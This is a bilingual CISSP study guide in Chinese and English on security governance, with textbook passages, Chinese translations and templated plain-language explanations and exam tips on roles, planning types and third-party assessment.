与性能指标类似, 安全指标是对与安全功能运行相关的性能、功能、操作、行为等的度量。 当实 施了应对措施或防护手段时,安全指标应显示出不希望发生的事件减少,或对 尝试行为的检测增加。 测量和评估安全指标的行为,就是评估安全计划的完整 性和有效性的实践。 这还应包括将其与通用安全指南进行对比,并跟踪其控制 措施的成功情况。 跟踪和评估安全指标是有效安全治理的一部分。

小白解释

场景先行:公司准备上线一个新业务系统,技术团队说可以买设备,法务说要合规,业务说不能影响上线。安全治理就是让高层定方向:安全要服务业务目标,风险由谁接受,预算花在哪里。

这一页真正想让你理解的是:认证后还要授权,之后靠审计和日志追责。

把它放进公司里看,关键不是背定义,而是判断:如果没有治理,安全会变成各部门各做各的:有人只想省钱,有人只想堆工具,最后责任不清。

你作为负责人可以这样想:先定策略和责任,再把战略拆成战术计划和日常运营计划。

本页术语用人话说:

安全治理:治理负责定方向、定责任、定监督方式。它不是配置防火墙,而是决定组织为什么要做安全、由谁负责、做到什么程度。

风险评估:风险评估是先找资产、威胁、漏洞和影响,再决定控制措施。

成本效益:安全控制不能无限堆钱,要用合理成本降低最重要的风险。

授权:授权是认证之后决定你能访问什么、能做什么。

常见误区:不要把治理理解成配置设备;治理是方向、责任和监督。

读完后用一句话复述:如果我是高层管理者 / CISO,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“授权、审计与问责”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是高层管理者 / CISO在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 governance,优先想高层责任、业务目标、策略、监督和持续改进。

风险评估不是漏洞扫描;它更高层,服务于决策和资源分配。

CISSP 喜欢考成本收益:控制成本不应明显超过被降低的风险价值。

认证成功不等于什么都能做;权限仍要单独授权。

合同、SLA、审计报告、现场评估、持续监控是高频点。

排除法提醒:不要把治理理解成配置设备;治理是方向、责任和监督。

本页术语拆解
安全治理 治理负责定方向、定责任、定监督方式。它不是配置防火墙,而是决定组织为什么要做安全、由谁负责、做到什么程度。
风险评估 风险评估是先找资产、威胁、漏洞和影响,再决定控制措施。
成本效益 安全控制不能无限堆钱,要用合理成本降低最重要的风险。
授权 授权是认证之后决定你能访问什么、能做什么。
第三方治理 外包出去不等于责任也外包出去,组织仍要监督供应商。
运行授权 ATO ATO 表示系统被授权在特定条件下运行。文档不足可能导致 ATO 丢失。
政策 政策是高层原则,说明必须遵守什么。
标准 标准给出必须满足的最低要求。
学习单元 21 / PDF P98

安全职能与业务战略对齐

安全目标要服务业务目标,并受预算和资源限制。

教材原文段落

Managing the security function includes the development and implementation of information security strategies. Most of the content of this book, addresses the various aspects of the development and implementation of information security strategies. Alignment of Security Function to Business Strategy, Goals, Mission, and Objectives Security management planning ensures the proper creation, implementation, and enforcement of a security policy. Security management planning aligns the security functions to the strategy, goals, mission, and objectives of the organization. This includes designing and implementing security based on business cases, budget restrictions, or scarcity of resources.

A business case is usually a documented argument or stated position in order to define a need to make a decision or take some form of action. To make a business case is to demonstrate a business-specific need to alter an existing process or choose an approach to a business task. A business case is often made to justify the start of a new project, especially a project related to security. Money and resources, such as people, technology, and space, are limited in most organizations. Due to resource limitations like these, the maximum benefit needs to be obtained from any endeavor. A top-down approach is one of the most effective ways to tackle security management planning.

Upper or senior management is responsible for initiating and defining policies for the organization. Security policies provide direction for all levels of the organization's hierarchy. Middle management's responsibility is to flesh out the security policy into standards, baselines, guidelines, and procedures. The operational managers or security professionals must then implement the configurations prescribed in the security management documentation. Finally, the end users must comply with all the security policies of the organization. The opposite of the top-down approach is the bottom-up approach.

In a bottom-up approach environment, the IT staff makes security decisions directly without input from senior management. The bottom-up approach is rarely used in organizations and is considered problematic in the IT industry.

中文直译 / 整理

管理安全职能包括信息安全管理策略的制定与实施。 本书的大部分内容涉及信 息安全管理策略制定与实施的各个方面。 安全功能与业务战略、目标、使命和目标的对齐 安全管理规划确保安全策略的正确制定、实施和执行。 安全管理规划将安全功 能与组织的战略、目标、使命和目标对齐。 这包括基于业务案例、预算限制或 资源稀缺来设计和实施安全措施。 业务案例通常是为定义决策需求或采取某种 行动而撰写的论证或明确立场。 提出业务案例是为了证明需要更改现有流程或 选择某种业务任务的处理方式。 业务案例通常用于论证启动新项目的必要性, 尤其是与安全相关的项目。 在大多数组织中,资金和资源(如人员、技术和空 间)是有限的。 由于存在此类资源限制,任何努力都必须实现最大效益。 自上而下的方法是应对安全管理规划最有效的方式之一。 高层或高级管理层负 责启动和定义组织的政策。 安全政策为组织层级的各个层面提供指导。 中层管 理的责任是将安全政策细化为标准、基线、指南和程序。 运营经理或安全专业 人员则必须实施安全管理系统文档中规定的配置。 最后,最终用户必须遵守组 织的所有安全政策。 自上而下方法的对立面是自下而上方法。

在自下而上方法环境中, IT人员直接做出安全决策,无需高层管理者的参与。 自下而上方法在组 织中很少使用,在IT行业中被认为存在问题。

小白解释

场景先行:公司准备上线一个新业务系统,技术团队说可以买设备,法务说要合规,业务说不能影响上线。安全治理就是让高层定方向:安全要服务业务目标,风险由谁接受,预算花在哪里。

这一页真正想让你理解的是:安全目标要服务业务目标,并受预算和资源限制。

把它放进公司里看,关键不是背定义,而是判断:如果没有治理,安全会变成各部门各做各的:有人只想省钱,有人只想堆工具,最后责任不清。

你作为负责人可以这样想:先定策略和责任,再把战略拆成战术计划和日常运营计划。

本页术语用人话说:

业务战略对齐:安全要支持组织使命和目标,而不是单独追求技术完美。

政策:政策是高层原则,说明必须遵守什么。

标准:标准给出必须满足的最低要求。

指南:指南是建议做法,不一定强制。

常见误区:不要把治理理解成配置设备;治理是方向、责任和监督。

读完后用一句话复述:如果我是高层管理者 / CISO,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全职能与业务战略对齐”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是高层管理者 / CISO在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

安全目标要与业务目标、预算、资源约束对齐。

Policy 高层、强制、稳定;Procedure 具体步骤。

Minimum level、mandatory requirement 常对应 standard。

Recommended、not compulsory 常对应 guideline。

Step-by-step、SOP 常对应 procedure。

排除法提醒:不要把治理理解成配置设备;治理是方向、责任和监督。

本页术语拆解
业务战略对齐 安全要支持组织使命和目标,而不是单独追求技术完美。
政策 政策是高层原则,说明必须遵守什么。
标准 标准给出必须满足的最低要求。
指南 指南是建议做法,不一定强制。
程序 程序是一步一步怎么做。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 22 / PDF P99

角色与职责:谁最终负责,谁执行保护

CISSP 很爱考 owner、custodian、senior manager 的责任边界。

教材原文段落

Security management is a responsibility of upper management, not of the IT staff, and is considered an issue of business operations rather than IT administration. The team or department responsible for security within an organization should be autonomous. The information security (InfoSec) team should be led by a designated chief information security officer (CISO) who reports directly to senior management, such as the chief information officer (CIO), the chief executive officer (CEO), or the board of directors. Placing the autonomy of the CISO and the CISO's team outside the typical hierarchical structure in an organization can improve security management across the entire organization.

It also helps avoid cross-department and internal political issues. The term chief security officer (CSO) is sometimes used as an alternative to CISO, but in many organizations, the CSO position is a subposition under the CISO that focuses on physical security. Another potential term for the CISO is information security officer (ISO), but this also can be used as a subposition under the CISO. The chief information officer (CIO) focuses on ensuring information is used effectively to accomplish business objectives. The chief technical officer (CTO) focuses on ensuring that equipment and software work properly to support the business functions.

Elements of security management planning include defining security roles; prescribing how security will be managed, who will be responsible for security, and how security will be tested for effectiveness; developing security policies; performing risk analysis; and requiring security education for employees. These efforts are guided through the development of management plans. The best security plan is useless without one key factor: approval by senior management. Without senior management's approval of and commitment to the security policy, the policy will not succeed.

It is the responsibility of the policy development team to educate senior management sufficiently so managers understand the risks, liabilities, and exposures that remain even after security measures prescribed in the policy are deployed. Developing and implementing a security policy is evidence of due diligence and due care on the part of senior management. If a company does not practice due diligence and due care, managers can be held liable for negligence and held accountable for both asset and financial losses.

中文直译 / 整理

安全管理是高层管理者的责任,而非IT人员的责任,它被视为业务运营问题, 而非IT管理问题。 组织内负责安全的团队或部门应具有自主性。 信息安全( InfoSec)团队应由指定的首席信息安全部长(CISO)领导,该负责人直接向高 层管理者汇报,例如首席信息官(CIO)、首席执行官(CEO)或董事会。 将 CISO及其团队的自主权置于组织典型层级结构之外,有助于提升整个组织的安 全管理水平,并有助于避免跨部门和内部政治问题。 术语首席安全官(CSO) 有时用作CISO的替代称谓,但在许多组织中,CSO职位是CISO下属的职位, 专注于物理安全。 CISO的另一个可能术语是信息安全部长(ISO),但该术语 也可能作为CISO下属的职位使用。 首席信息官(CIO) 专注于确保信息被有效利用以实现业务目标。 首席技术官(CTO) 专注于确保设备和软件正常运行以支持业务功能。 安全管理规划的要素包括定义安全角色; 规定安全管理方式、安全责任人以及 如何测试安全的有效性; 制定安全政策; 进行风险分析; 以及要求员工接受安 全教育。 这些工作通过制定管理计划来指导。 最好的安全计划如果没有一个关键因素:高级管理层的批准,也是无用的。

如 果没有高级管理层对安全政策的批准和承诺,该政策将无法成功。 政策制定团 队有责任充分教育高级管理层,使管理者了解即使在实施政策中规定的安全措 施后,仍存在的风险、责任和暴露问题。 制定和实施安全政策是高级管理层尽 职尽责的体现。 如果公司不践行尽职尽责,管理者可能因疏忽而被追究责任, 并对资产和财务损失负责。

小白解释

场景先行:公司准备上线一个新业务系统,技术团队说可以买设备,法务说要合规,业务说不能影响上线。安全治理就是让高层定方向:安全要服务业务目标,风险由谁接受,预算花在哪里。

这一页真正想让你理解的是:CISSP 很爱考 owner、custodian、senior manager 的责任边界。

把它放进公司里看,关键不是背定义,而是判断:如果没有治理,安全会变成各部门各做各的:有人只想省钱,有人只想堆工具,最后责任不清。

你作为负责人可以这样想:先定策略和责任,再把战略拆成战术计划和日常运营计划。

本页术语用人话说:

首席信息安全官:CISO 负责组织安全计划、策略、沟通和监督。

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

NIST:NIST 提供美国常用安全标准、框架和指南。

应有谨慎:应有谨慎是采取合理行动,像一个负责组织应该做的那样去做。

常见误区:不要把治理理解成配置设备;治理是方向、责任和监督。

读完后用一句话复述:如果我是高层管理者 / CISO,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“角色与职责:谁最终负责,谁执行保护”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是高层管理者 / CISO在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

CISO 需要足够独立性和高层支持。

ISO 偏标准和管理体系。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Due care 偏“做正确的事”。

Due diligence 偏“确认事情被正确执行”。

排除法提醒:不要把治理理解成配置设备;治理是方向、责任和监督。

本页术语拆解
首席信息安全官 CISO 负责组织安全计划、策略、沟通和监督。
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
NIST NIST 提供美国常用安全标准、框架和指南。
应有谨慎 应有谨慎是采取合理行动,像一个负责组织应该做的那样去做。
尽职调查 尽职调查是持续检查、验证和监督是否做到了。
政策 政策是高层原则,说明必须遵守什么。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
学习单元 23 / PDF P100

三类安全计划:战略、战术、运营

长期方向、中期落地、短期日常要分清。

教材原文段落

A security management planning team should develop three types of plans, as shown in Figure 1.3: Strategic Plan A strategic plan is a long-term plan that is fairly stable. It defines the organization's security purpose. It defines the security function and aligns it with the goals, mission, and objectives of the organization. It's useful for about five years if it is maintained and updated annually. The strategic plan also serves as the planning horizon. Long-term goals and visions for the future are discussed in a strategic plan. A strategic plan should include a risk assessment.

Tactical Plan The tactical plan is a midterm plan developed to provide more details on accomplishing the goals set forth in the strategic plan or can be crafted ad hoc based on unpredicted events. A tactical plan is typically useful for about a year and often prescribes and schedules the tasks necessary to accomplish organizational goals. Some examples of tactical plans are project plans, acquisition plans, hiring plans, budget plans, maintenance plans, support plans, and system development plans. Operational Plan An operational plan is a short-term, highly detailed plan based on strategic and tactical plans. It is valid or useful only for a short time.

Operational plans must be updated often (such as monthly or quarterly) to retain compliance with tactical plans. Operational plans spell out how to accomplish the various goals of the organization. They include resource allotments, budgetary requirements, staffing assignments, scheduling, and step-by-step or implementation procedures. Operational plans include details on how the implementation processes are in compliance with the organization's security policy. Examples of operational plans are training plans, system deployment plans, and product design plans.

中文直译 / 整理

安全管理工作组应制定三种类型的计划,如图1.3所示: 战略计划 一个 战略计划 是一个长期且相对稳定的计划。 它定义了组织的安 全目标,明确了安全职能,并使其与组织的目标、使命和宗旨保持一致。 如 果每年进行维护和更新,该计划的有效期约为五年。 战略计划还作为规划的 期限,用于讨论长期目标和对未来愿景的构想。 战略计划应包括风险评估。 战术计划 战术计划 是一项中期计划,旨在提供更详细的执行方案以实现战 略计划中设定的目标,或根据不可预见的事件临时制定。 战术计划通常有效 期为一年,常规定并安排实现组织目标所需的各项工作任务。 战术计划的一 些示例包括项目计划、采购计划、招聘计划、预算计划、维护计划、支持计 划和系统开发计划。 运营计划 一个运营计划 是基于战略和战术计划制定的短期、高度详细的计 划。 它仅在短期内有效或有用。 运营计划必须经常更新(如每月或每季度), 以保持与战术计划的一致性。 运营计划阐明了如何实现组织的各个目标。 它 们包括资源分配、预算需求、人员配置、排程以及分步骤的实施流程。 运营 计划还包含有关实施过程如何符合组织安全政策的详细信息。 运营计划的例 子包括培训计划、系统部署计划和产品设计计划。

小白解释

场景先行:公司准备上线一个新业务系统,技术团队说可以买设备,法务说要合规,业务说不能影响上线。安全治理就是让高层定方向:安全要服务业务目标,风险由谁接受,预算花在哪里。

这一页真正想让你理解的是:长期方向、中期落地、短期日常要分清。

把它放进公司里看,关键不是背定义,而是判断:如果没有治理,安全会变成各部门各做各的:有人只想省钱,有人只想堆工具,最后责任不清。

你作为负责人可以这样想:先定策略和责任,再把战略拆成战术计划和日常运营计划。

本页术语用人话说:

风险评估:风险评估是先找资产、威胁、漏洞和影响,再决定控制措施。

战略计划:战略计划是长期、稳定、方向性的安全计划。

战术计划:战术计划把战略拆成中期可执行方案。

运营计划:运营计划是每天、每周、每月执行的具体活动。

常见误区:不要把治理理解成配置设备;治理是方向、责任和监督。

读完后用一句话复述:如果我是高层管理者 / CISO,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“三类安全计划:战略、战术、运营”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是高层管理者 / CISO在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

风险评估不是漏洞扫描;它更高层,服务于决策和资源分配。

Strategic 长期,Tactical 中期,Operational 短期日常。

战术计划通常支持战略计划落地。

日常操作、流程、任务安排常归 operational。

Policy 高层、强制、稳定;Procedure 具体步骤。

排除法提醒:不要把治理理解成配置设备;治理是方向、责任和监督。

本页术语拆解
风险评估 风险评估是先找资产、威胁、漏洞和影响,再决定控制措施。
战略计划 战略计划是长期、稳定、方向性的安全计划。
战术计划 战术计划把战略拆成中期可执行方案。
运营计划 运营计划是每天、每周、每月执行的具体活动。
政策 政策是高层原则,说明必须遵守什么。
程序 程序是一步一步怎么做。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 24 / PDF P101

安全治理:定方向、定责任、定监督

治理负责让安全和组织目标对齐,并形成可监督的体系。

教材原文段落

FIGURE 1.3 Strategic, tactical, and operational plan timeline comparison Security is a continuous process. Thus, the activity of security management planning may have a definitive initiation point, but its tasks and work are never fully accomplished or complete. Effective security plans focus attention on specific and achievable objectives, anticipate change and potential problems, and serve as a basis for decision-making for the entire organization. Security documentation should be concrete, well-defined, and clearly stated. For a security plan to be effective, it must be developed, maintained, and actually used.

Organizational Processes Security governance should address every aspect of an organization, including the organizational processes of acquisitions, divestitures, and governance committees. Acquisitions and mergers place an organization at an increased level of risk. Such risks include inappropriate information disclosure, data loss, downtime, or failure to achieve sufficient return on investment (ROI). In addition to all the typical business and financial aspects of mergers and acquisitions, a healthy dose of security oversight and increased scrutiny is often essential to reduce the likelihood of losses during such a period of transformation.

Similarly, divestiture or any form of asset or employee reduction is another time period of increased risk and, thus, increased need for focused security governance. Assets need to be sanitized to prevent data leakage. Storage media should be removed and destroyed because media sanitization techniques do not guarantee against data remnant recovery. Employees released from duty need to be debriefed. This process is often called an exit

中文直译 / 整理

图 1.3 战略、战术和运营计划时间线比较 安全是一个持续的过程。 因此,安全管理规划活动可能有明确的启动点,但其 任务和工作永远不会完全完成。 有效的安全计划聚焦于具体且可实现的目标, 预见变化和潜在问题,并为整个组织的决策提供依据。 安全文档应具体、明确 且表述清晰。 要使安全计划有效,必须制定、维护并实际使用它。 组织流程 安全治理应涵盖组织的各个方面,包括收购、剥离和治理委员会等组织流程。 收购和合并会使组织面临更高的风险。 这些风险包括不当的信息泄露、数据丢 失、停机或未能实现足够的投资回报率(ROI)。 除了并购中所有典型业务和 财务方面外,通常还需要充分的安全监督和更严格的审查,以降低在此转型期 发生损失的可能性。 同样,剥离或任何形式的资产或员工削减是另一个风险增加的时期,因此需 要更加注重安全治理。 资产需要进行清理,以防止数据泄露。 应移除并销毁 存储介质,因为介质清理技术无法保证完全防止数据残留恢复。 被解除职务 的员工需要接受离岗面谈。 此过程通常称为退出

小白解释

场景先行:公司准备上线一个新业务系统,技术团队说可以买设备,法务说要合规,业务说不能影响上线。安全治理就是让高层定方向:安全要服务业务目标,风险由谁接受,预算花在哪里。

这一页真正想让你理解的是:治理负责让安全和组织目标对齐,并形成可监督的体系。

把它放进公司里看,关键不是背定义,而是判断:如果没有治理,安全会变成各部门各做各的:有人只想省钱,有人只想堆工具,最后责任不清。

你作为负责人可以这样想:先定策略和责任,再把战略拆成战术计划和日常运营计划。

本页术语用人话说:

安全治理:治理负责定方向、定责任、定监督方式。它不是配置防火墙,而是决定组织为什么要做安全、由谁负责、做到什么程度。

运营计划:运营计划是每天、每周、每月执行的具体活动。

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

资产:资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。

常见误区:不要把治理理解成配置设备;治理是方向、责任和监督。

读完后用一句话复述:如果我是高层管理者 / CISO,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全治理:定方向、定责任、定监督”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是高层管理者 / CISO在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 governance,优先想高层责任、业务目标、策略、监督和持续改进。

日常操作、流程、任务安排常归 operational。

ISO 偏标准和管理体系。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

排除法提醒:不要把治理理解成配置设备;治理是方向、责任和监督。

本页术语拆解
安全治理 治理负责定方向、定责任、定监督方式。它不是配置防火墙,而是决定组织为什么要做安全、由谁负责、做到什么程度。
运营计划 运营计划是每天、每周、每月执行的具体活动。
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
学习单元 25 / PDF P102

第三方评估:文档、现场、审计

不同评估方式关注不同证据,不能只听口头承诺。

教材原文段落

interview. This process usually involves reviewing any nondisclosure agreements and any other binding contracts or agreements that will continue after employment has ceased. When acquisitions and mergers are made without security considerations, the risks inherent in those obtained products remain throughout their deployment life span. Minimizing inherent threats in acquired elements will reduce security management costs and likely reduce security violations. It is important to evaluate the risks associated with hardware, software, and services. Products and solutions that have resilient integrated security are often more expensive than those that fail to have a security foundation.

However, this additional initial expense is often a much more cost-effective expenditure than addressing security deficiencies over the life of a poorly designed product. Thus, when considering the cost of a merger/acquisition, it is important to consider the total cost of ownership over the life of the product's deployment rather than just initial purchase and implementation. Acquisitions do not relate exclusively to hardware and software. Outsourcing, contracting with suppliers, and engaging consultants are also elements of acquisition. Integrating security assessments when working with external entities is just as important as ensuring a product was designed with security in mind.

In many cases, ongoing security monitoring, management, and assessment may be required. This could be an industry best practice or a regulation. Such assessment and monitoring might be performed by the organization internally or may require the use of external auditors. When engaging thirdparty assessment and monitoring services, keep in mind that the external entity needs to show security-mindedness in their business operations. If an external organization is unable to manage their own internal operations on a secure basis, how can they provide reliable security management functions for yours?

When evaluating a third party for your security integration, consider the following processes: On-Site Assessment Visit the site of the organization to interview personnel and observe their operating habits. Document Exchange and Review Investigate the means by which datasets and documentation are exchanged and the formal processes by

中文直译 / 整理

面谈。 此过程通常涉及审查任何保密协议以及在雇佣关系终止后仍继续有效的 其他具有约束力的合同或协议。 当收购和合并未考虑安全因素时,所获得产品中固有的风险将贯穿其整个部署 生命周期。 减少收购元素中的固有威胁将降低安全管理成本,并可能减少安全 违规行为。 评估与硬件、软件和服务相关的风险至关重要。 具有弹性内置安全性的产品和 解决方案通常比缺乏安全基础的产品更昂贵。 然而,这种额外的初始支出往往 比在设计不良的产品整个生命周期内修复安全缺陷更具成本效益。 因此,在考 虑合并/收购的成本时,重要的是考虑产品部署全生命周期的总拥有成本,而不 仅仅是初始采购和实施成本。 收购不仅限于硬件和软件。 外包、与供应商签约以及聘请顾问也是收购的组成 部分。 在与外部实体合作时整合安全评估,与确保产品在设计时即考虑安全同 样重要。 在许多情况下,可能需要持续的安全监控、管理和评估。 这可能是行业最佳实 践或法规要求。 此类评估和监控可由组织内部执行,也可能需要使用外部审计 师。 在聘请第三方评估和监控服务时,请记住,外部实体必须在业务运营中展 现出安全意识。

如果一个外部组织无法以安全的方式管理其自身的内部运营, 又如何能为您的组织提供可靠的安全管理功能? 在为您的安全集成评估第三方时,请考虑以下流程: 现场评估 访问组织的现场,与员工面谈并观察其操作习惯。 文档交换与评审 调查数据集和文档交换的方式,以及进行评估和评审的正式流 程

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:不同评估方式关注不同证据,不能只听口头承诺。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

成本效益:安全控制不能无限堆钱,要用合理成本降低最重要的风险。

审计:审计记录主体行为,用于追责、复盘和取证。

审计:审计检查控制是否存在、是否有效、是否符合要求。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第三方评估:文档、现场、审计”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

CISSP 喜欢考成本收益:控制成本不应明显超过被降低的风险价值。

没有日志和身份绑定,就很难问责。

审计题关注独立性、证据、范围和报告。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
成本效益 安全控制不能无限堆钱,要用合理成本降低最重要的风险。
审计 审计记录主体行为,用于追责、复盘和取证。
审计 审计检查控制是否存在、是否有效、是否符合要求。
学习单元 26 / PDF P103

安全治理:定方向、定责任、定监督

治理负责让安全和组织目标对齐,并形成可监督的体系。

教材原文段落

which they perform assessments and reviews. This focuses on the means and processes. Process/Policy Review Request copies of their security policies, processes/procedures, and documentation of incidents and responses for review. This focuses on the written policies. Third-Party Audit Having an independent third-party auditor, as defined by the American Institute of Certified Public Accountants (AICPA), can provide an unbiased review of an entity's security infrastructure, based on System and Organization Controls (SOC) reports. See Chapter 15 for details on SOC reports. For all acquisitions, establish minimum security requirements. These should be modeled after your existing security policy.

The security requirements for new hardware, software, or services should always meet or exceed the security of your existing infrastructure. When working with an external service, be sure to review any service-level agreement (SLA) to ensure that security is a prescribed component of the contracted services. When that external provider is crafting software or providing a service (such as a cloud provider), then a service-level requirement (SLR) may need to be defined. An SLR is a statement of the expectations of service and performance from the product or service of a vendor.

Often, an SLR is provided by the customer/client prior to the establishment of the SLA (which should incorporate the elements of the SLR if the vendor expects the customer to sign the agreement). Two additional examples of organizational processes that are essential to strong security governance are change control/change management (see Chapter 16, “Managing Security Operations”) and data classification (see Chapter 5, “Protecting Security of Assets”). Organizational Roles and Responsibilities A security role is an individual's part in the overall scheme of security implementation and administration within an organization.

Security roles are not necessarily prescribed in job descriptions because they are not always distinct or static. Familiarity with security roles will help in establishing a communications and support structure within an organization. This structure will enable the deployment and enforcement of the security policy. This section focuses on general-purpose security roles for managing an overall

中文直译 / 整理

它们执行评估和评审的方式。 这侧重于方式和流程。 流程/策略审查 请求获取其安全策略、流程/程序以及事件和响应的文档以供 审查。 此环节侧重于书面政策。 第三方审计 根据美国注册会计师协会(AICPA)的定义,聘请独立的 第三方审计机构可基于系统与组织控制(SOC)报告,对实体的安全基 础设施提供客观的审查。 详见第15章有关SOC报告的详细信息。 对于所有收购活动,应建立最低安全要求。 这些要求应以您现有的安全策略为 模型。 对于新硬件、软件或服务的安全要求,必须达到或超过您现有基础设施 的安全水平。 在与外部服务提供商合作时,务必审查任何服务级别协议( SLA),以确保安全是合同服务中明确规定的组成部分。 当该外部提供商正在 开发软件或提供服务(例如云提供商)时,可能需要定义服务级别要求( SLR)。 SLR 是对供应商产品或服务的服务与性能期望的陈述。 通常,SLR 由客户/ 客户端在签订 SLA 之前提供(如果供应商期望客户签署协议,则 SLA 应包 含 SLR 的各项要素)。

两个对强化安全治理至关重要的组织流程的其他示例是变更控制/变更管理 (参见第16章,“安全管理运营”)和数据分类(参见第5章,“保护资 产安全”)。 组织角色与职责 一个 安全角色 是个人在组织内安全实施与管理整体方案中的职责。 安全角色不 一定在职位描述中明确规定,因为它们并不总是明确或静态的。 了解安全角色 有助于在组织内建立沟通与支持结构,该结构将促进安全策略的部署与执行。 本节重点介绍用于管理整体

小白解释

场景先行:公司准备上线一个新业务系统,技术团队说可以买设备,法务说要合规,业务说不能影响上线。安全治理就是让高层定方向:安全要服务业务目标,风险由谁接受,预算花在哪里。

这一页真正想让你理解的是:治理负责让安全和组织目标对齐,并形成可监督的体系。

把它放进公司里看,关键不是背定义,而是判断:如果没有治理,安全会变成各部门各做各的:有人只想省钱,有人只想堆工具,最后责任不清。

你作为负责人可以这样想:先定策略和责任,再把战略拆成战术计划和日常运营计划。

本页术语用人话说:

安全治理:治理负责定方向、定责任、定监督方式。它不是配置防火墙,而是决定组织为什么要做安全、由谁负责、做到什么程度。

审计:审计记录主体行为,用于追责、复盘和取证。

NIST:NIST 提供美国常用安全标准、框架和指南。

政策:政策是高层原则,说明必须遵守什么。

常见误区:不要把治理理解成配置设备;治理是方向、责任和监督。

读完后用一句话复述:如果我是高层管理者 / CISO,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全治理:定方向、定责任、定监督”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是高层管理者 / CISO在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 governance,优先想高层责任、业务目标、策略、监督和持续改进。

没有日志和身份绑定,就很难问责。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Policy 高层、强制、稳定;Procedure 具体步骤。

Step-by-step、SOP 常对应 procedure。

排除法提醒:不要把治理理解成配置设备;治理是方向、责任和监督。

本页术语拆解
安全治理 治理负责定方向、定责任、定监督方式。它不是配置防火墙,而是决定组织为什么要做安全、由谁负责、做到什么程度。
审计 审计记录主体行为,用于追责、复盘和取证。
NIST NIST 提供美国常用安全标准、框架和指南。
政策 政策是高层原则,说明必须遵守什么。
程序 程序是一步一步怎么做。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
数据分类 数据分类按敏感度和价值给数据贴等级,决定保护强度。
审计 审计检查控制是否存在、是否有效、是否符合要求。
学习单元 27 / PDF P104

角色与职责:谁最终负责,谁执行保护

CISSP 很爱考 owner、custodian、senior manager 的责任边界。

教材原文段落

security infrastructure. See Chapter 5 for roles related specifically to data management. The following are the common security roles present in a typical secured environment: Senior Manager The organizational owner (senior manager) role is assigned to the person who is ultimately responsible for the security maintained by an organization and who should be most concerned about the protection of its assets. The senior manager must sign off on all security policy issues. There is no effective security policy if the senior management does not authorize and support it.

The senior manager is the person who will be held liable for the overall success or failure of a security solution and is responsible for exercising due diligence and due care in establishing security for an organization. Even though senior managers are ultimately responsible for security, they rarely implement security solutions. In most cases, that responsibility is delegated to security professionals within the organization.

Security Professional The security professional, information security (InfoSec) officer, or cyber incident response team (CIRT) role is assigned to a trained and experienced network, systems, and security engineer who is responsible for following the directives mandated by senior management. The security professional has the functional responsibility for security, including writing the security policy and implementing it. The role of a security professional may be labeled as an IS/IT role, but its focus is on protection more than function.

The security professional role is often filled by a team that is responsible for designing and implementing security solutions based on the approved security policy. Security professionals are not decision makers; they are implementers. All decisions must be left to the senior manager. Asset Owner The asset owner role is assigned to the person who is responsible for classifying information for placement and protection within the security solution. The asset owner is typically a high-level manager who is ultimately responsible for asset protection. However, the asset owner usually delegates the responsibility of the actual data management tasks to a custodian.

